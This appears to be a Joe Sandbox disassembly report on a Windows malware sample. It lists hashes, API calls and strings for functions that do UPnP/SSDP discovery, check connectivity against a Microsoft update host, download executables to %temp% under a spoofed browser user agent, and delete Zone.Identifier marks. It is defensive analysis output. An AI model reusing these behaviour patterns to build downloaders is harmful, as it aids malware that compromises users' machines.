• Opcode ID: a09a2fb70ac58d7a455ce99dedba2fb0f2ccef32fdecf11c004df1e88a2033b1
• Instruction ID: 3d527d3106709ffe12c11fbc149f9fb6bead9182873b01420bf0fd5d4f043c35
• Opcode Fuzzy Hash: a09a2fb70ac58d7a455ce99dedba2fb0f2ccef32fdecf11c004df1e88a2033b1
• Instruction Fuzzy Hash: C441B070640301BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E445C75A
APIs
• socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
• htons.WS2_32(0000076C), ref: 0040DC10
• inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
• setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
  • Part of subcall function 0040AF30: htons.WS2_32(00000050), ref: 0040AF5D
  • Part of subcall function 0040AF30: socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
  • Part of subcall function 0040AF30: connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
  • Part of subcall function 0040AF30: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
• bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
• lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
• sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
• ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
  • Part of subcall function 0040DD40: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
  • Part of subcall function 0040DD40: Sleep.KERNEL32(000003E8), ref: 0040DD9E
  • Part of subcall function 0040DD40: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
  • Part of subcall function 0040DD40: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
  • Part of subcall function 0040DD40: StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
• String ID: 239.255.255.250
• API String ID: 726339449-2186272203
• Opcode ID: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
• Instruction ID: ef7ed27ddc10e69a95ecf683d08ad8987f4418d9446925fcf09c3d01f5f265dc
• Opcode Fuzzy Hash: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
• Instruction Fuzzy Hash: 7141F8B4E10208ABDB14DFE4E889BEEBBB5EF48304F108169F505B7390E7B55A44CB59
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
• socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
• htons.WS2_32(?), ref: 00401508
• setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
• bind.WS2_32(?,?,00000010), ref: 0040153B
  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
• CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
• String ID:
• API String ID: 4174406920-0
• Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
• Instruction ID: ddf1df2f5e3c49f21769c3cd8a86baa6c810c68bf5de7ecead628d1f617bc177
• Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
• Instruction Fuzzy Hash: 72319571A44301AFE320DF649C4AF9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
APIs
• GetTickCount.KERNEL32 ref: 0040D1B2
• ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D1D8
• recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D20F
• GetTickCount.KERNEL32 ref: 0040D224
• Sleep.KERNEL32(00000001), ref: 0040D244
• GetTickCount.KERNEL32 ref: 0040D24A
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: CountTick$Sleepioctlsocketrecv
• String ID:
• API String ID: 107502007-0
• Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
• Instruction ID: d1d91ce4da814b9a63f0d024f91aac80a52589da6ae3f0e8ee31fa34877a49b5
• Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
• Instruction Fuzzy Hash: 5A31CA74D00209EFCF04DFA4DA48AEE77B1FF44315F1086A9E825A7290D7749A94CB59
APIs
• htons.WS2_32(00000050), ref: 0040AF5D
  • Part of subcall function 0040AEF0: inet_addr.WS2_32(0040AF71), ref: 0040AEFA
  • Part of subcall function 0040AEF0: gethostbyname.WS2_32(?), ref: 0040AF0D
• socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
• connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
• getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
Strings
• www.update.microsoft.com, xrefs: 0040AF67
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
• String ID: www.update.microsoft.com
• API String ID: 4063137541-1705189816
• Opcode ID: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
• Instruction ID: 8d2b89a1e3841e6cd000a2b550c173cff20965c169263ef180e6ea1a6d777d84
• Opcode Fuzzy Hash: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
• Instruction Fuzzy Hash: D1213BB0E103099BCB04DFE8D946AEEBBB5AF08300F108169E504F7390E7745A44CBAA
APIs
• CryptAcquireContextW.ADVAPI32(~@,00000000,00000000,00000001,F0000040,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C343
• CryptGenRandom.ADVAPI32(~@,?,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C359
• CryptReleaseContext.ADVAPI32(~@,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C365
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID: ~@
• API String ID: 1815803762-592544116
• Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
• Instruction ID: 830194fa38359529e853ee3f0456384099f2f8dd9552bb81b1528bc6e0449336
• Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
• Instruction Fuzzy Hash: B3E01275654208BBDB24CFE1EC49FDA776CAB48B00F108154FB09D7190DAB5EA409BA8
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DA0D,00000000), ref: 004013D5
• socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
• bind.WS2_32(?,?,00000010), ref: 00401429
  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
• CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
• String ID:
• API String ID: 3943618503-0
• Opcode ID: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
• Instruction ID: 1e7a4891c1a42a5318b19a32161f2d9e989c632f85172a1bcc985bb178a8dbbc
• Opcode Fuzzy Hash: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
• Instruction Fuzzy Hash: 18119674A40710AFE3609F749C0AF877AE0AF04B14F50892DF699E62E1E2B49544878A
APIs
• WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
• WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
• Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
• WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: Recv$ErrorLastSleep
• String ID:
• API String ID: 3668019968-0
• Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
• Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
• Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
• Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
APIs
• NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
• RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: Time$QuerySecondsSince1980System
• String ID:
• API String ID: 1987401769-0
• Opcode ID: 0613ca7d0cb934da7a106d9058381de88b753c7355ee9c1788c1bc259270ea14
• Instruction ID: 71f66deb3bce6efc95a111259a7627df0bb84068fda71d22670a2dc98323c2b1
• Opcode Fuzzy Hash: 0613ca7d0cb934da7a106d9058381de88b753c7355ee9c1788c1bc259270ea14
• Instruction Fuzzy Hash: 4FD09E79C4010DABCB04DBE4E849CDDB77CEA44201F0086D5AD1592150EAB066588B95
                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
APIs
• NtQueryVirtualMemory.NTDLL ref: 0040F63A
Similarity
• API ID: MemoryQueryVirtual
APIs
• GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A3AC
Similarity
• API ID: HeapsProcess
APIs
• CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
Similarity
• API ID: CreateInstance

Control-flow Graph

APIs
• GetTickCount.KERNEL32 ref: 0040EF99
• srand.MSVCRT ref: 0040EFA0
• ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EFC0
• strlen.NTDLL ref: 0040EFCA
• mbstowcs.NTDLL ref: 0040EFE1
• rand.MSVCRT ref: 0040EFE9
• rand.MSVCRT ref: 0040EFFD
• wsprintfW.USER32 ref: 0040F024
• InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F03A
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F069
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F098
• InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F0CB
• WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F0FC
• CloseHandle.KERNEL32(000000FF), ref: 0040F10B
• wsprintfW.USER32 ref: 0040F124
• DeleteFileW.KERNEL32(?), ref: 0040F134
• Sleep.KERNEL32(000003E8), ref: 0040F13F
• Sleep.KERNEL32(000007D0), ref: 0040F160
• ExitProcess.KERNEL32 ref: 0040F188
• DeleteFileW.KERNEL32(?), ref: 0040F19E
• CloseHandle.KERNEL32(000000FF), ref: 0040F1AB
• InternetCloseHandle.WININET(00000000), ref: 0040F1B8
• InternetCloseHandle.WININET(00000000), ref: 0040F1C5
• Sleep.KERNEL32(000003E8), ref: 0040F1D0
• rand.MSVCRT ref: 0040F1E5
• Sleep.KERNEL32 ref: 0040F1FC
• rand.MSVCRT ref: 0040F202
• rand.MSVCRT ref: 0040F216
• wsprintfW.USER32 ref: 0040F23D
• DeleteUrlCacheEntryW.WININET(?), ref: 0040F24D
• URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F267
• wsprintfW.USER32 ref: 0040F287
• DeleteFileW.KERNEL32(?), ref: 0040F297
• Sleep.KERNEL32(000003E8), ref: 0040F2A2
• Sleep.KERNEL32(000007D0), ref: 0040F2C3
• ExitProcess.KERNEL32 ref: 0040F2EA
• DeleteFileW.KERNEL32(?), ref: 0040F2F9
Strings
• %s:Zone.Identifier, xrefs: 0040F118
• %s\%d%d.exe, xrefs: 0040F231
• %s\%d%d.exe, xrefs: 0040F018
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F035
• %s:Zone.Identifier, xrefs: 0040F27B
• %temp%, xrefs: 0040EFBB
Similarity
• API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
• String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36

Control-flow Graph (rendered graph not reproduced)

APIs
  • Part of subcall function 0040B280: gethostname.WS2_32(?,00000100), ref: 0040B29C
  • Part of subcall function 0040B280: gethostbyname.WS2_32(?), ref: 0040B2AE
• strcmp.NTDLL ref: 0040B380
Similarity
• API ID: gethostbynamegethostnamestrcmp
• String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.

Control-flow Graph (rendered graph not reproduced)

APIs
• GetTickCount.KERNEL32 ref: 0040192C
• WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
• WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
• WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
• accept.WS2_32(?,?,?), ref: 004019A8
• GetTickCount.KERNEL32 ref: 004019F6
• EnterCriticalSection.KERNEL32(?), ref: 00401A09
• LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
• LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
• GetTickCount.KERNEL32 ref: 00401A43
• EnterCriticalSection.KERNEL32(?), ref: 00401A52
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
• LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
• GetTickCount.KERNEL32 ref: 00401AAB
• WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 3345448188-3762367603
                                                                                • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction ID: 2c6eba30162642fa916e9f7e0fa03190df933f3dd928bdc23040f585d31ac0f6
                                                                                • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction Fuzzy Hash: 9E41F671600300ABCB209F74DC8CB9B77A9AF44720F14463DF995A72E1DB78E881CB99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E9C8
                                                                                • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EA18
                                                                                • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EA2B
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EA64
                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EA9A
                                                                                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EAC5
                                                                                • HttpSendRequestA.WININET(00000000,00411FA0,000000FF,00009E34), ref: 0040EAEF
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EB2E
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040EB80
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBB1
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBBE
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBCB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                • API String ID: 2761394606-2217117414
                                                                                • Opcode ID: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction ID: 65d8e98dfcdbd5221f12c344ddab433f9c0af5994e8cd23f0dde2b718a24ef5d
                                                                                • Opcode Fuzzy Hash: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction Fuzzy Hash: 91512EB5901228ABDB26CF54CC54FE9B3BCAB48705F1485E9B60DA6280D7B86FC4CF54

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 2403999931-3762367603
                                                                                • Opcode ID: fdb9d9f1c1081d3bac4efd2c1ea591fdf2f72c624c4a3d2a847f061e6529de26
                                                                                • Instruction ID: 4aeae16d9e67a94d8ff1aa5cc2109be900ec35187bf01e7539301e61904878f7
                                                                                • Opcode Fuzzy Hash: fdb9d9f1c1081d3bac4efd2c1ea591fdf2f72c624c4a3d2a847f061e6529de26
                                                                                • Instruction Fuzzy Hash: FA319475900705ABC7209F70EC48B97B7A8BF08300F048A3AF559A3691C77AF894CB98

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 00405838
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                                                                • Sleep.KERNEL32(00000001), ref: 00405864
                                                                                • GetTickCount.KERNEL32 ref: 0040586A
                                                                                • GetTickCount.KERNEL32 ref: 00405873
                                                                                • wsprintfW.USER32 ref: 00405886
                                                                                • RegisterClassExW.USER32(00000030), ref: 00405893
                                                                                • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                                                                • TranslateMessage.USER32(?), ref: 004058E5
                                                                                • DispatchMessageA.USER32(?), ref: 004058EF
                                                                                • ExitThread.KERNEL32 ref: 00405901
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                • String ID: %x%X$0
                                                                                • API String ID: 716646876-225668902
                                                                                • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction ID: f3e1014eb48ffaf448ebc99f6ba60d6258e7c56012e586919e9efecad1237f6d
                                                                                • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction Fuzzy Hash: BB211A71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E098
                                                                                • InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
